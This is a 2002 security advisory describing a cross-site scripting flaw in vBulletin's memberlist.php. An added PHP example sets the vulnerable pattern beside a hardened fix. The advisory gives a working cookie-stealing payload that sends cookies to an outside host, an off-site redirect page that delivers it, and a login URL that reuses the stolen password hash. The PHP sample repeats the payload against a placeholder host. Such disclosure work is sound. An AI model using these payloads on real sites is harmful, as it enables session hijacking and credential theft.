[UNIX] vBulletin's memberlist.php Allows Username and Password Stealing
From: support@securiteam.com Date: 03/23/02
From: support@securiteam.com To: list@securiteam.com Date: Sat, 23 Mar 2002 12:06:44 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
vBulletin's memberlist.php Allows Username and Password Stealing
------------------------------------------------------------------------
SUMMARY
vBulletin is a commonly used web forum system written in PHP. One of its
key features is its use of templates, which allow the board administrator to
dynamically modify the look of the board. A security vulnerability in the
program allows attackers to insert malicious HTML and JavaScript into the
memberlist.php results; this allows an attacker to steal the username
and password of users who click on a malicious URL.
DETAILS
Within the first few lines of code in memberlist.php, the variable
$letterbits is evaluated without having been initialized by the script.
Because of the way PHP initializes variables, the value can be supplied
from the request, so HTML or JavaScript can be injected into the document
by directing a user to, for example:
http://vulnerable/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E
(NOTE: The URL is a single line)
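The root cause is the uninitialized $letterbits being populated from the query string and echoed into the page unescaped. The following is an added example, not vBulletin's own code: it reconstructs that pattern in a small function (the real memberlist.php is not on this page, so the shape of the vulnerable code is an assumption) and puts the hardened version beside it. The allow-list of "a single letter or all" is likewise an assumption about what a member-list letter filter should accept; the payload and hostname in the sample input are constructed.

```php
<?php
// Added example (not vBulletin's code): the vulnerable pattern described in the
// advisory, reconstructed as an assumption, beside a hardened version of it.

// VULNERABLE (reconstruction): with register_globals enabled, PHP pre-populates
// $letterbits from ?letterbits=... when the script never initialises it, and the
// raw value is later written into the page. extract() stands in for that
// behaviour so the function runs on any PHP version.
function render_letterbits_vulnerable(array $request_globals): string
{
    extract($request_globals);            // every query parameter becomes a variable
    if (!isset($letterbits)) {
        $letterbits = '';
    }
    return "<p>Showing members: $letterbits</p>";   // attacker-controlled markup lands verbatim
}

// HARDENED: initialise explicitly from $_GET, accept only values the member list
// actually offers (assumed here: one letter or the catch-all "all"), and
// HTML-escape on output regardless of the allow-list.
function render_letterbits_hardened(array $get): string
{
    $letter = $get['letterbits'] ?? 'all';               // explicit initialisation
    if (!preg_match('/\A(?:[a-z]|all)\z/i', $letter)) {
        $letter = 'all';                                 // anything off the allow-list is dropped
    }
    $safe = htmlspecialchars($letter, ENT_QUOTES, 'UTF-8'); // output encoding as a second layer
    return "<p>Showing members: $safe</p>";
}

// Constructed sample input: the decoded form of the kind of payload the advisory
// describes, pointed at a placeholder host.
$attack = [
    'letterbits' => "<script>location='http://attacker.invalid/record.php?cook='+escape(document.cookie)</script>",
];

echo render_letterbits_vulnerable($attack), "\n";            // script element reaches the browser
echo render_letterbits_hardened($attack), "\n";              // falls back to the catch-all value
echo render_letterbits_hardened(['letterbits' => 'q']), "\n"; // legitimate letter passes through
```

Either half of the fix alone would have stopped this particular report (an explicit initialisation, or output encoding), but the allow-list is what keeps the parameter from carrying anything other than the values the template needs, and the escaping protects every code path that later reuses the variable.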
You can steal the user's password hash and user id. Because of the way
vBulletin parses URLs, the above will not function inside the forum, but
if we put this in an off-site HTML file:
<script>
location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>
and then link to that file instead, the exploit works as intended. The user
does not even have to be aware of what has transpired: the above link first
loads the member list with the cookie-stealing code and then proceeds to
http://www.swgmotu.com.
With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash]
ADDITIONAL INFORMATION
The information has been provided by <mailto:plato@swgmotu.com> plato.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.